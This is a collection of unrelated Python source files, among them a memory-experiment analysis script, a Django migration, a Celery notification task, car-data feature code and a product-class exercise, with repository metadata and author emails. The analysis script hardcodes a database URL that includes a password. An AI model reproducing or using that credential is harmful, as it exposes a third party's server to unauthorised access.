[ 601.7647 , -1621.3757 , -782.529 ],
[ 600.382 , -1621.5862 , -781.91595],
[ 598.99927, -1621.7965 , -781.30286],
[ 597.6165 , -1622.0068 , -780.6898 ],
[ 596.23376, -1622.2172 , -780.0767 ],
[ 594.8511 , -1622.4275 , -779.4637 ],
[ 593.4683 , -1622.6378 , -778.8506 ],
[ 592.0856 , -1622.8481 , -778.23755],
[ 590.7028 , -1623.0586 , -777.6245 ],
[ 589.3201 , -1623.2689 , -777.0114 ],
[ 584.3293 , -1613.4741 , -771.6261 ],
[ 582.9551 , -1613.6832 , -771.01685],
[ 602.41003, -1621.6876 , -781.18054],
[ 601.0273 , -1621.898 , -780.5675 ],
[ 599.6446 , -1622.1083 , -779.9544 ],
[ 598.26184, -1622.3186 , -779.3414 ],
[ 596.8791 , -1622.529 , -778.7283 ],
[ 595.49634, -1622.7394 , -778.11523],
[ 594.11365, -1622.9497 , -777.50214],
[ 592.7309 , -1623.16 , -776.8891 ],
[ 591.34814, -1623.3704 , -776.276 ],
[ 589.96545, -1623.5807 , -775.66296],
[ 584.9706 , -1613.784 , -770.28595],
[ 583.5964 , -1613.9932 , -769.67664],
[ 603.05536, -1621.9995 , -779.8321 ],
[ 601.6726 , -1622.2098 , -779.219 ],
[ 600.28986, -1622.4202 , -778.60596],
[ 598.90717, -1622.6305 , -777.99286],
[ 597.5244 , -1622.8408 , -777.3798 ],
[ 596.14166, -1623.0511 , -776.7667 ],
[ 591.1088 , -1613.2578 , -771.38293],
[ 589.7346 , -1613.4668 , -770.7737 ],
[ 588.3604 , -1613.6759 , -770.16437],
[ 586.98615, -1613.885 , -769.55505],
[ 585.61194, -1614.094 , -768.9458 ],
[ 584.23773, -1614.3031 , -768.3365 ],
[ 603.7007 , -1622.3113 , -778.4836 ],
[ 602.31793, -1622.5216 , -777.87054],
[ 600.9352 , -1622.7319 , -777.25745],
[ 599.5525 , -1622.9423 , -776.6444 ],
[ 598.16974, -1623.1527 , -776.0313 ],
[ 596.787 , -1623.363 , -775.4183 ],
[ 591.7502 , -1613.5677 , -770.0428 ],
[ 590.376 , -1613.7767 , -769.4335 ],
[ 589.0017 , -1613.9858 , -768.8242 ],
[ 587.6275 , -1614.1948 , -768.2149 ],
[ 586.2533 , -1614.4039 , -767.6056 ],
[ 584.8791 , -1614.6129 , -766.99634]], dtype=np.float32) | [
"jmpark@rit.kaist.ac.kr"
] | jmpark@rit.kaist.ac.kr |
a1b5e8a56474fb37eb4c74c13acbf7f476558b26 | 6079cd52ff1a570ab684406da5ab468e94ee1472 | /analysis/activemem_preexpose_analysis.py | 39340f232d4ed84ff23cfeeef2019b38b9251592 | [] | no_license | kachergis/active_memory_preexpose | 268c2b3daaceefa45c7efecae3cc64199d553649 | 5dca5b781099fff71689a1dfd3159347d3a942d6 | refs/heads/master | 2021-01-21T21:54:24.043149 | 2016-03-22T13:33:00 | 2016-03-22T13:33:00 | 42,272,275 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,100 | py | import json
import pandas as pd
import numpy as np
from sqlalchemy import *
#from mypy.datautil import download_data_from_mysqldb
DATADIR = '/Users/george/active_memory_preexpose/analysis/data'
def spath(sid):
return '%s/%s.json' % (DATADIR, sid)
FIGDEST = '/Users/george/active_memory_preexpose/analysis/figures'
##########################################
# Data from mysql database
##########################################
def download_data_from_mysqldb(dburl, tablename):
versionname = ''
engine = create_engine(dburl)
metadata = MetaData()
metadata.bind = engine
table = Table(tablename, metadata, autoload=True)
s = table.select()
rs = s.execute()
data = []
for row in rs:
data.append(row)
df = pd.DataFrame(data, columns=table.columns.keys())
return df
dburl = "mysql://lab:fishneversink@gureckislab.org/mt_experiments"
tablename = "activemem"
datacolumn = "datastring"
df_all = download_data_from_mysqldb(dburl, tablename)
# save datastring to separate files
for i, r in df_all.iterrows():
if r['datastring']!=None:
with open(spath(r['workerid']), 'w') as f:
f.write(r['datastring'])
# subject ids should be same as workerid in the table
SUBJ = ['11', '017', '18', '26', '27', '28', '29', '31', '33', '34', '36', '41', \
'45', '46', '47', '48', '55', '56', '57', '58', '110', '111', '113', '115', '211', '213', \
'215', '410','411','413','415','510','511','513','1000','1058','1061','1065',\
'1071','1075','1076','1081','1082','1086','1091','1095','1097','1101','1105','1106','1107',\
'1112','1115','1116','1117','1122','1126','1127','1131','1135','1137','10613','10615','10617',\
'10710','10715','10717','10718','10811','10813','10817','10910','10911','10915','10917','10918',\
'11010','11011','11013','11111','11115','11117','11210','11211','11213','11215','11217','11218',\
'11310','11313','11317','11318']
# '1065-retest', '10811-retest' ..a few with weird names (A3GDTSFHVBUJHD), and some tests
print len(SUBJ) # 92
def data(sid):
try:
with open('/Users/george/active_memory_preexpose/analysis/data/%s.json' % sid, 'r') as f:
lines = f.read()
data = json.loads(lines)
trialdata = [d['trialdata'] for d in data['data']]
return trialdata
except:
return None
# nobody has a partnerid in the preexpose study
#def partnerid(sid):
# return filter(lambda d: d[0]=='partnerid', data(sid))[0][1]
# just grabs the item id..?
def item_map(sid, block):
items = filter(lambda d: d[0]=='study' and d[1]==block and d[3]=='item', data(sid))
return dict([map(int, [it[5].lstrip('ind='), it[4].lstrip('id=')]) for it in items])
# where each item in a study block is: {0: 131, 1: 129, 2: 27, 3: 71, 4: 133, 5: 142, 6: 132, 7: 44}
def studyseq_locations(sid, block):
studied = filter(lambda d: d[0]=='study' and d[1]==block and d[3].count('item-') > 0 and d[4]=='study', data(sid))
locs = map(int, [ep[3].lstrip('item-') for ep in studied])
return locs
# want an array of the seuqnece of study items -- with times
def get_studyseq(sid, block):
# 'subject', 'block', 'preexpose', 'item', 'index', 'startt', 'stopt', 'duration', 'id'
# [u'study', 2, u'all', u'item-4', u'episode', 18216, 18589, 373]
print str(sid) + " " + str(block)
m = item_map(sid, block) # {0: 127, 1: 32, 2: 84, 3: 100, 4: 108, 5: 53, 6: 51, 7: 68}
studied = filter(lambda d: d[0]=='study' and d[1]==block and d[3].count('item-') > 0 and d[4]=='episode', data(sid))
arr = []
index = 0
bl = 0
for st in studied:
if bl==st[1]:
index += 1
else:
bl += 1
index = 1
st[0] = sid
st[3] = st[3].lstrip('item-')
st[4] = index
st.append(m[int(st[3])])
arr.append(st)
#locs = map(int, [ep[3].lstrip('item-') for ep in studied])
return arr
def studyseq_items(sid, block):
m = item_map(sid, block)
return [m[loc] for loc in studyseq_locations(sid, block)]
# data(sid)[2]
# [u'preexpose', [u'left', u'right', u'all']]
# studyseq_locations('11', 0) 0,1,2 = gives sequence of locations that they studied during that block
# e.g. [5, 4, 0, 1, 2, 3] would like to extract the time each item is exposed, too...
# studyseq_items('11',0) picture numbers (not locations):
# [131, 129, 27, 133, 131, 129, 27, 71, 142, 133, 142, 44, 133, 142, 44, 132, 129, 131, 129]
preexpose_inds = {'left':[0,1,4,5], 'right':[2,3,6,7], 'all':[0,1,2,3,4,5,6,7]}
def studieditems(sid, block):
return list(np.unique(studyseq_items(sid, block)))
# change to n_preexposed_items_studied
def n_active_items_studied(sid):
"""Across both active blocks, find proportion of items that chosen for study."""
preexp_ord = data(sid)[2][1] # e.g., ['left','all','right']
# intersect studyseq_locations(sid, 0) and preexpose_inds[preexp_ord[0]]
# (and do the same for blocks 1 and 2)
return (len(studieditems(sid, 0)) + len(studieditems(sid, 2)))
def proportion_active_items_studied(sid):
"""Across both active blocks, find proportion of items that chosen for study."""
return n_active_items_studied(sid)/24.
def testdata(sid):
return filter(lambda tr: tr[0]=='test' and len(tr)==8 and tr[2]!='item', data(sid))
def get_testdata(sid):
T = testdata(sid)
arr = []
# [u'test', 3, 11, 127, False, u'new', u'old', False]
for td in T:
td[0] = sid
arr.append(td)
return arr
def test_scores(sid):
T = testdata(sid)
hits_active = 0
hits_yoked = 0
misses_active = 0
misses_yoked = 0
fa = 0
cr = 0
for td in T:
print td
if td[5]=='active':
if td[6]=='old':
hits_active += 1
else:
misses_active += 1
elif td[5]=='yoked':
if td[6]=='old':
hits_yoked += 1
else:
misses_yoked += 1
else:
if td[6]=='old':
fa += 1
else:
cr += 1
return [hits_active, misses_active, hits_yoked, misses_yoked, fa, cr]
def test_scores_studied(sid):
items = []
for block in range(4):
items += studieditems(sid, block)
td = filter(lambda d: d[3] in items, testdata(sid))
active_resp = 1*np.array([x[-1] for x in filter(lambda d: d[5]=='active', td)])
yoked_resp = 1*np.array([x[-1] for x in filter(lambda d: d[5]=='yoked', td)])
return [np.sum(active_resp==1), np.sum(active_resp==0), active_resp.mean(), np.sum(yoked_resp==1), np.sum(yoked_resp==0), yoked_resp.mean()]
# def retest_scores(sid):
# if data('%s-retest' % sid) == None:
# return [np.nan for _ in range(6)]
# else:
# return test_scores('%s-retest' % sid)
# old (doug's study)
# arr = []
# for sid in SUBJ:
# arr.append([sid] + [str(df_all[df_all.workerid==sid]['beginhit'].values[0]).split('T')[0]] + test_scores(sid) + retest_scores(sid) + [n_active_items_studied(sid), proportion_active_items_studied(sid)])
# df = pd.DataFrame(arr, columns=['subj', 'date', 'H_active', 'M_active', 'H_yoked', 'M_yoked', 'FA', 'CR', 'T2_H_active', 'T2_M_active', 'T2_H_yoked', 'T2_M_yoked', 'T2_FA', 'T2_CR', 'nStudiedActive', 'propStudiedActive'])
# df['T1_diff'] = df['H_active'] - df['H_yoked']
# df['T2_diff'] = df['T2_H_active'] - df['T2_H_yoked']
# df.to_csv('results.csv')
# from task.js:
# output(['item', 'id='+self.stimid, 'ind='+self.ind, 'row='+self.row, 'col='+self.col, 'image='+self.img, 'preexpose='+self.preexposed]);
# output([self.id, 'episode', self.episode['start_time'], self.episode['end_time'], self.episode['duration']]);
# test: output([i, ti['ind'], ti['studied'], ti['cond'], resp, correct ])
arr = []
for sid in SUBJ:
arr = arr + get_testdata(sid)
df = pd.DataFrame(arr, columns=['subj', 'block','index', 'item', 'studied', 'cond', 'response', 'correct'])
df.to_csv('test_trials.csv')
sarr = []
for sid in SUBJ:
for bl in range(3):
sarr = sarr + get_studyseq(sid, bl)
sdf = pd.DataFrame(sarr, columns=['subj', 'block', 'preexpose', 'item', 'index', 'startt', 'stopt', 'duration', 'id'])
sdf.to_csv('study_trials.csv')
studlocs = []
for sid in SUBJ:
for bl in range(3):
tmp = item_map(sid, bl)
for loc, item in tmp.iteritems():
studlocs.append([sid, bl, loc, item])
sdf = pd.DataFrame(studlocs, columns=['subj', 'block', 'loc', 'item'])
sdf.to_csv('study_locations.csv')
# new -- preexpose; no partner, no yoked vs. active...now have preexpose left/right/all,
arr = []
for sid in SUBJ:
arr.append([sid] + [str(df_all[df_all.workerid==sid]['beginhit'].values[0]).split('T')[0]] + test_scores(sid) + [n_active_items_studied(sid), proportion_active_items_studied(sid)])
df = pd.DataFrame(arr, columns=['subj', 'date', 'H_active', 'M_active', 'H_yoked', 'M_yoked', 'FA', 'CR', 'nStudiedActive', 'propStudiedActive'])
df['T1_diff'] = df['H_active'] - df['H_yoked']
df['T2_diff'] = df['T2_H_active'] - df['T2_H_yoked']
df.to_csv('results.csv')
| [
"george.kachergis@gmail.com"
] | george.kachergis@gmail.com |
b72cc7fc9900186d2c4518e65f638726f8e73224 | 282b2618e198a21b28549220fad67b4f59b33076 | /kudaalmaty/migrations/0011_auto_20180423_1428.py | 3934716ca2be5f7ea43d92b678fc83718cc9b93e | [] | no_license | aizadaaskar/almaty | 086fa1a309dab40c4bd657d4b314f18643966bf7 | 7aee6f9cec1c9f871c1170f13c609e00ce1aa755 | refs/heads/master | 2020-03-19T03:11:04.282614 | 2018-06-01T09:43:30 | 2018-06-01T09:43:30 | 135,702,965 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 836 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-04-23 08:28
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('kudaalmaty', '0010_auto_20180423_1426'),
]
operations = [
migrations.AlterField(
model_name='comm',
name='author',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='review',
name='auth',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| [
"a210598@gmail.com"
] | a210598@gmail.com |
3174cb3171565b286739301b8b282a20994032af | 52b46c794fa98114e74d896a0080d122ab4c925c | /backend/chat/tasks.py | 09d465b1b0e043f1a6bcab368040d0e1ed36afb9 | [] | no_license | GameMoon/community_place_administration_tool | 97ec9ae006009b601a97edf450aef7eb35ec3746 | 6624693e8531eb15ce0df3494b790f958bb52f33 | refs/heads/main | 2023-01-19T02:44:02.129701 | 2020-11-29T21:35:51 | 2020-11-29T21:35:51 | 315,940,818 | 0 | 0 | null | 2020-11-28T14:42:14 | 2020-11-25T13:01:09 | JavaScript | UTF-8 | Python | false | false | 926 | py | from __future__ import absolute_import, unicode_literals
from celery import shared_task
from channels.layers import get_channel_layer
from asgiref.sync import async_to_sync
from cpa_tool.models import Event
from datetime import datetime, timedelta
def send_notification(event_name):
channel_layer = get_channel_layer()
async_to_sync(channel_layer.group_send)(
'lobby',
{
'type': 'chat_message',
'user': "System",
'message': event_name+" starting in 15 minutes"
}
)
@shared_task
def check_events():
events = Event.objects.filter(start__lt=(datetime.now() + timedelta(minutes=16)).isoformat(),
start__gt=(datetime.now() + timedelta(minutes=14)).isoformat())
if len(events) == 0: return
for event in events:
print("starting: ", event.title)
send_notification(event.title)
| [
"ugrindaniel@gmail.com"
] | ugrindaniel@gmail.com |
b908f84054746b6b52b930a9937c5237dd6cd33f | 18fc741bde76cde9da8a5f402ca830bc6e662192 | /models/LiyangCarStore.py | a8336140c3c26e69612c57f2ab9e5aba5374d72b | [] | no_license | aiyuanddsg/car_car_similarity | 2252c8384589cd8da327337ef811f5c074a4db29 | c9776a39c7142fb65bc520f6d386ee033a205444 | refs/heads/master | 2021-01-18T05:00:23.928697 | 2017-03-08T04:02:16 | 2017-03-08T04:02:16 | 84,273,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,726 | py | #-*- coding: UTF-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import pandas as pd
class LiyangCarStore(object):
numerical_cols = 'price_guide_min price_guide_max xinglixiangrongji_min xinglixiangrongji_max gongxinbuzongheyouhao pailiang chemenshu dangweishu zuixiaozhuanwanbanjing tingchannianfen zuoweishu zuigaochesu zuidazaizhongzhiliang chang kuan gao qianlunju houlunju zuidagonglv zuidaniuju zuidamali zuidaniujuzhuansu zuidagonglvzhuansu qigangrongji youxiangrongji zhengbeizhiliang zuixiaolidijianxi yangshengqishuliang qigangshu niankuan shengchannianfen shangshinianfen jiasushijian zhouju yasuobi meigangqimenshu shangshiyuefen'.split()
ordinal_cols = 'xuniduodieCD anquandaiweixitishi LATCHzuoyijiekou houpaisandianshianquandai anquandaiyushoujingongneng zheyangbanhuazhuangjing zidongzhuche_shangpofuzhu fujiashianquanqinang zidongtoudeng zuoyitongfeng zhenpizuoyi zhenpifangxiangpan zhongkongtaicaisedaping houzuochufengkou kongqidiaojie_huafenguolv bochefuzhu houpaiceqinang fangxiangpanhuandang qianpaitoubuqinang houzuozhongyangfushou houpaizuoyidiandongdiaojie houshijingzidongfangxuanmu duogongnengfangxiangpan jiashizuozuoyidiandongdiaojie dingweihudongfuwu houpaibeijia zidongkongdiao zhuanxiangtoudeng xibuqinang fangxiangpandiandongdiaojie zishiyingxunhang rijianxingchedeng xianqidadeng qianpaiceqinang duodieDVD chezaixinxifuwu fujiashizuozuoyidiandongdiaojie chezaidianshi houpaidulikongdiao diandongxihemen wuyaoshiqidongxitong jianbuzhichengdiaojie zhongkongyejingpingfenpingxianshi dierpaizuoyiyidong houdiandongchechuang yeshixitong cheneifenweideng dierpaikaobeijiaodudiaojie houshijingjiyi zhudongchache qianwudeng wendufenqukongzhi xingchediannaoxianshiping houshijingjiare cheshenwendingkongzhi dingsuxunhang chechuangfangjiashougongneng daocheshipinyingxiang LEDdadeng qianyinlikongzhi zhudongzhuanxiangxitong jiashizuoanquanqinang ABSfangbaosi houyushua houpaizuoyibilifangdao daocheleida yaokongyaoshi houpaiyejingping lanya/chezaidianhua quanjingtianchuang qiandiandongchechuang bingxianfuzhu disanpaizuoyi fadongjidianzifangdao neizhiyingpan dadenggaodukediao quanjingshexiangtou zhongkongsuo kebianxuangua qianzuozhongyangfushou houshijingdiandongdiaojie chachefuzhu doupohuanjiang diandongtianchuang fangxiangpanqianhoudiaojie taiyajiancezhuangzhi ganyingyushua gereboli dadengqingxizhuangzhi dandieCD fangxiangpanshangxiadiaojie qianpaizuoyijiare GPSdaohang zidongbocheruwei diandongzuoyijiyi zhidonglifenpei houpaicezheyanglian lingtaiyajixuxingshi yundongzuoyi houpaizuoyijiare zuoyianmo yinpinzhichiMP3 HUDtaitoushuzixianshi kongdiao houpaizuoyizhengtifangdao houpaitoubuqinang renjijiaohuxitong houshijingdiandongzhedie kebianzhuanxiangbi chezaibingxiang waijieyinyuanjiekou yaobuzhichengdiaojie ISOFIXertongzuoyijiekou kongqixuangua zuoyigaodidiaojie dandieDVD duodieCD diandonghoubeixiang houfengdangzheyanglian yundongwaiguantaojian'.split()
categorical_cols = 'cheshenyanse qianlunguguige houlunguguige ranyoubiaohao biansuxiangleixing chetijiegou cheliangjibie cheliangleixing cheshenxingshi fadongjiweizhi ranyouleixing qudongxingshi qudongfangshi gongyoufangshi jinqixingshi qigangpailiexingshi zhuanxiangjixingshi shengchanzhuangtai guochanhezijinkou guobie pinpai changjia tag_id chexi biansuqimiaoshu paifangbiaozhun zhulileixing lungucailiao qianzhidongqileixing houzhidongqileixing qianxuangualeixing houxuangualeixing'.split()
def __init__(self, file_data, file_desc=None):
self.data = pd.read_csv(file_data, sep='\t', quoting=3, dtype=str).set_index('id')
self.desc = None if file_desc is None else pd.read_csv(file_desc, sep='\t', quoting=3, names=['col', 'desc'])
def get_data(self):
reto = self.get_ordinals()
retn = self.get_numericals()
retc = self.get_categoricals()
#print retn
ret = pd.concat([retn, reto, retc], axis=1)
ret.index = ret.index.map(int)
return ret, retn.columns.tolist() + reto.columns.tolist(), retc.columns.tolist()
def get_numericals(self):
df = self.data
df['pailiang'] = df.pailiang.replace('电动', '-1').astype(float) # TEMP
df['price_guide_min'] = df.zhidaojiage.fillna('0').replace('待查', '0').str.split(r'[~-]').str[0].astype(float) * 10000
#print df['price_guide_min']
df['price_guide_max'] = df.zhidaojiage.fillna('0').replace('待查', '0').str.split(r'[~-]').str[-1].astype(float) * 10000
df['xinglixiangrongji_min'] = df.xinglixiangrongji.fillna('0').str.split(r'\D+').str[0].replace('', '0').astype(int)
df['xinglixiangrongji_max'] = ((df.xinglixiangrongji.fillna('0') + '-') * 2).str.split(r'\D+').str[1].replace('', '0').astype(int)
df['gongxinbuzongheyouhao'] = df.gongxinbuzongheyouhao.fillna('0').replace('9月13日', '0').str.split(r'[-/(]').str[0].astype(float)
df['chemenshu'] = df.chemenshu.map({'两门': 2, '三门': 3, '四门': 4, '五门': 5, '六门': 6})
df['dangweishu'] = df.dangweishu.fillna('0').replace('无级', '10').str.extract(r'(\d+)', expand=False).astype(int)
df['zuixiaozhuanwanbanjing'] = df.zuixiaozhuanwanbanjing.fillna('0').str.split('/').str[0].astype(float)
df['tingchannianfen'] = df.tingchannianfen.replace(u'\u2014'.encode('utf8'), 0).astype(int)
for col in ['zuoweishu', 'zuigaochesu', 'zuidazaizhongzhiliang', 'chang', 'kuan', 'gao', 'qianlunju', 'houlunju', 'zuidagonglv', 'zuidaniuju', 'zuidamali', 'zuidaniujuzhuansu', 'zuidagonglvzhuansu', 'qigangrongji', 'youxiangrongji', 'zhengbeizhiliang', 'zuixiaolidijianxi', 'yangshengqishuliang']:
df[col] = df[col].fillna('0').astype(str).str.extract(r'(\d+)', expand=False).fillna('0').astype(int)
for col in ['qigangshu', 'niankuan', 'shengchannianfen', 'shangshinianfen', 'meigangqimenshu', 'shangshiyuefen']:
df[col] = df[col].fillna('0').astype(int)
for col in ['jiasushijian', 'yasuobi', 'zhouju']:
df[col] = df[col].fillna('0').astype(float)
#print df[self.numerical_cols]
return df[self.numerical_cols]
def get_ordinals(self):
#print self.ordinal_cols
for col in self.ordinal_cols:
self.data[col] = self.data[col].map(
{'无': 1, '无无': 1, '选配': 2, '选装': 2, '有?': 3, '有': 4, 'USB+AUX': 4}).fillna(0)
#print self.data[self.ordinal_cols]
return self.data[self.ordinal_cols]
def get_categoricals(self):
for col in ['qianxuangualeixing', 'houxuangualeixing']:
self.data[col] = self.data[col].apply(
lambda s: s.decode('utf8')[:3].encode('utf8') if isinstance(s, str) else s)
return self.data[self.categorical_cols]
| [
"aiyuanddsg@163.com"
] | aiyuanddsg@163.com |
84bdd520eadf99d59b7050fc9997f3169b24002f | ac6d7f0bef68eed32797f0fe22b10d615bd15edd | /model.py | f981658cf1d88d11c6fe6dea3569389098289b18 | [
"Apache-2.0"
] | permissive | cyzLoveDream/TNB | 3358220bf43f45b1a83329aeeb82079e7e3ec98d | 14ed6c3628643f02727ab4c96b976c2781336dad | refs/heads/master | 2021-05-12T03:25:05.865931 | 2018-01-29T06:20:29 | 2018-01-29T06:20:29 | 117,618,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,892 | py | import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
import warnings
import xgboost as xgb
xgb.XGBRegressor
from sklearn.metrics import mean_squared_error
warnings.filterwarnings("ignore")
trains = pd.read_csv('../clean_data/base_train.csv',encoding="gbk")
tests = pd.read_csv('../clean_data/test.csv',encoding='gbk')
vals = pd.read_csv('../clean_data/model_fill_train.csv',encoding='gbk')
labels = "blood_sugar_log"
features = [x for x in list(trains.columns) if x not in ['id','date','blood_sugar','blood_sugar_log']]
X_val, X_test, y_val, y_test = train_test_split(vals[features], vals[labels],test_size=0.1, random_state=42)
all_data["feature_9_is_normal"] = all_data["feature_9"].apply(lambda x: 0 if x < 2.9 else (2 if x > 6 else 1))
all_data["feature_10_is_normal"] = all_data["feature_10"].apply(lambda x: 0 if x < 1.16 else (2 if x > 1.55 else 1))
all_data["feature_10_gender_is_normal"] = all_data[["feature_10","gender"]].apply(lambda x:
(0 if x[0] < 1.1 else 1) if x[1] == 1 else (2 if x[0] < 1.2 else 3),
axis=1)
all_data["feature_11_is_normal"] = all_data["feature_11"].apply(lambda x: 0 if x < 2.84 else (2 if x > 3.12 else 1))
all_data["feature_10_feature_11"] = round(all_data["feature_11"] / all_data['feature_10'],3)
all_data["feature_12_is_normal"] = all_data["feature_12"].apply(lambda x: 0 if x < 1.7 else (2 if x > 8.3 else 1))
all_data["feature_13_is_normal"] = all_data[["feature_13","gender"]].apply(lambda x:
(0 if x[0] < 53 else(2 if x[0] > 106 else 1)) if x[1] == 1 else (3 if x[0] < 44 else(5 if x[0] > 97 else 4)),
axis=1)
all_data["feature_14_is_normal"] = all_data[["feature_14","gender"]].apply(lambda x:
(0 if x[0] < 150 else(2 if x[0] > 416 else 1)) if x[1] == 1 else (3 if x[0] < 89 else(5 if x[0] > 357 else 4)),
axis=1)
all_data["feature_14_gender_is_normal"] = all_data[["feature_14","gender"]].apply(lambda x:
(0 if x[0] > 420 else 1) if x[1] == 1 else (2 if x[0] > 350 else 3),
axis=1)
all_data["feature_20_is_normal"] = all_data["feature_20"].apply(lambda x: 0 if x < 4 else (2 if x > 10 else 1))
all_data["feature_21_is_normal"] = all_data[["feature_21","gender"]].apply(lambda x:
(0 if x[0] < 4.0 else(2 if x[0] > 5.5 else 1)) if x[1] == 1 else (3 if x[0] < 3.5 else(5 if x[0] > 5.0 else 4)),
axis=1)
all_data["feature_22_is_normal"] = all_data[["feature_22","gender"]].apply(lambda x:
(0 if x[0] < 120 else(2 if x[0] > 160 else 1)) if x[1] == 1 else (3 if x[0] < 110 else(5 if x[0] > 150 else 4)),
axis=1)
all_data["feature_23_is_normal"] = all_data[["feature_23","gender"]].apply(lambda x:
(0 if x[0] < 0.4 else(2 if x[0] > 0.5 else 1)) if x[1] == 1 else (3 if x[0] < 0.37 else(5 if x[0] > 0.48 else 4)),
axis=1)
all_data["feature_24_is_normal"] = all_data["feature_24"].apply(lambda x: 0 if x < 80 else (2 if x > 100 else 1))
all_data["feature_25_is_normal"] = all_data["feature_25"].apply(lambda x: 0 if x < 27 else (2 if x > 34 else 1))
all_data["feature_26_is_normal"] = all_data["feature_26"].apply(lambda x: 0 if x < 320 else (2 if x > 360 else 1))
all_data["feature_27_is_normal"] = all_data["feature_27"].apply(lambda x: 0 if x < 11.5 else (2 if x > 14.5 else 1))
all_data["feature_28_is_normal"] = all_data["feature_28"].apply(lambda x: 0 if x < 100 else (2 if x > 300 else 1))
all_data["feature_29_is_normal"] = all_data["feature_29"].apply(lambda x: 0 if x < 9 else (2 if x > 13 else 1))
all_data["feature_30_is_normal"] = all_data["feature_30"].apply(lambda x: 0 if x < 9 else (2 if x > 17 else 1))
all_data["feature_31_is_normal"] = all_data["feature_31"].apply(lambda x: 0 if x < 0.13 else (2 if x > 0.43 else 1))
all_data["feature_32_is_normal"] = all_data["feature_32"].apply(lambda x: 0 if x < 50 else (2 if x > 70 else 1))
all_data["feature_20_feature_32"] = round(all_data["feature_20"] * all_data['feature_32'],3)
all_data["feature_33_is_normal"] = all_data["feature_33"].apply(lambda x: 0 if x < 20 else (2 if x > 40 else 1))
all_data["feature_20_feature_33"] = round(all_data["feature_20"] * all_data['feature_33'],3)
all_data["feature_34_is_normal"] = all_data["feature_34"].apply(lambda x: 0 if x < 3 else (2 if x > 8 else 1))
all_data["feature_20_feature_34"] = round(all_data["feature_20"] * all_data['feature_34'],3)
all_data["feature_35_is_normal"] = all_data["feature_35"].apply(lambda x: 0 if x < 0.5 else (2 if x > 5 else 1))
all_data["feature_20_feature_35"] = round(all_data["feature_20"] * all_data['feature_35'],3)
all_data["feature_36_is_normal"] = all_data["feature_36"].apply(lambda x: 0 if x < 0 else (2 if x > 1 else 1))
all_data["feature_20_feature_36"] = round(all_data["feature_20"] * all_data['feature_36'],3)
import lightgbm as lgb
model_lgb = lgb.LGBMRegressor(objective='regression',num_leaves=5,
learning_rate=0.05, n_estimators=550,
max_bin = 25, bagging_fraction = 0.8,
bagging_freq = 5, feature_fraction = 0.2319,
feature_fraction_seed=9, bagging_seed=9,
min_data_in_leaf =7, min_sum_hessian_in_leaf = 12)
score = rmsle_cv(model_lgb)
print("LGBM score: {:.4f} ({:.4f})\n" .format(score.mean(), score.std()))
[ 'feature_0_is_normal',
'feature_1_is_normal', 'feature_1_feature_0',
'feature_1_feature_0_is_normal', 'feature_2_is_normal',
'feature_3_is_normal', 'feature_4_is_normal', 'feature_5_is_normal',
'feature_6_is_normal', 'feature_8_is_normal', 'feature_9_is_normal',
'feature_10_is_normal', 'feature_10_gender_is_normal',
'feature_11_is_normal', 'feature_10_feature_11', 'feature_12_is_normal',
'feature_13_is_normal', 'feature_14_is_normal',
'feature_14_gender_is_normal', 'feature_20_is_normal',
'feature_21_is_normal', 'feature_22_is_normal', 'feature_23_is_normal',
'feature_24_is_normal', 'feature_25_is_normal', 'feature_26_is_normal',
'feature_27_is_normal', 'feature_28_is_normal', 'feature_29_is_normal',
'feature_30_is_normal', 'feature_31_is_normal', 'feature_32_is_normal',
'feature_20_feature_32', 'feature_33_is_normal',
'feature_20_feature_33', 'feature_34_is_normal',
'feature_20_feature_34', 'feature_35_is_normal',
'feature_20_feature_35', 'feature_36_is_normal',
'feature_20_feature_36', 'gender_0', 'gender_1']
| [
"cyz_19930904@163.com"
] | cyz_19930904@163.com |
eb7038b7af1edc2861e7a0a6640790e41a21c621 | 4ae20d4134a2ae54d8fd12c798af97b10f671df1 | /python网络编程2/01.复习.py | d9f71cb2976bea5cd14a49abe8671a61bde9b780 | [] | no_license | 964918654/python- | cd82f8a08742212ab614bb8c802f364e93a966cd | ae67a55b4f7e8fcefc562ced9b78a1c6a319ac53 | refs/heads/master | 2020-03-27T05:07:06.323025 | 2018-09-04T13:18:56 | 2018-09-04T13:18:56 | 145,994,986 | 1 | 0 | null | 2018-08-25T01:06:42 | 2018-08-24T13:29:11 | null | UTF-8 | Python | false | false | 147 | py | import socket
url = 'www.python.com' # 199.59.88.81
url = 'www.baidu.com' # 119.75.213.61
ip_address = socket.gethostbyname(url)
print(ip_address) | [
"964918654@qq.com"
] | 964918654@qq.com |
7b1a127047ebdd9fb946cd860bd342613a7bd3b2 | 597cababc54f45e94f3c11b4dd26f7344dae7809 | /Luminar_Python/functionalProgramming/product.py | 60c7840c62fd4041ac7cd0329b0213f2ae486406 | [] | no_license | Midhun10/LuminarPython | c87b272dc15746fc2745de774cc425b3a53aed99 | aa5d8ccb574ea1538cefd943c749fd14cd06ee5a | refs/heads/master | 2022-12-26T19:11:18.370001 | 2020-10-08T15:21:05 | 2020-10-08T15:21:05 | 280,052,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 729 | py | class Product:
def __init__(self,id,name,category,price):
self.id=id
self.name=name
self.category=category
self.price=price
def __str__(self):
return self.name
lst=[]
ob=lst.append(Product(1001,"Galaxy","Chocolate",210))
ob=lst.append(Product(1002,"Lux","Soap",45))
ob=lst.append(Product(1003,"Milma","Milk",23))
ob=lst.append(Product(1004,"666Rice","Rice",310))
for item in lst:
print(item)
# def con(name):
# return name.upper()
# print(con("midhun"))
up=list(map(lambda Product:(Product.name.upper()),lst))
print(up)
price=list(filter(lambda Product:Product.price>50,lst))
for value in price:
print(value.price)
# above=list(filter(lambda ,lst))
# print(above)
| [
"midhun.benny222@gmail.com"
] | midhun.benny222@gmail.com |
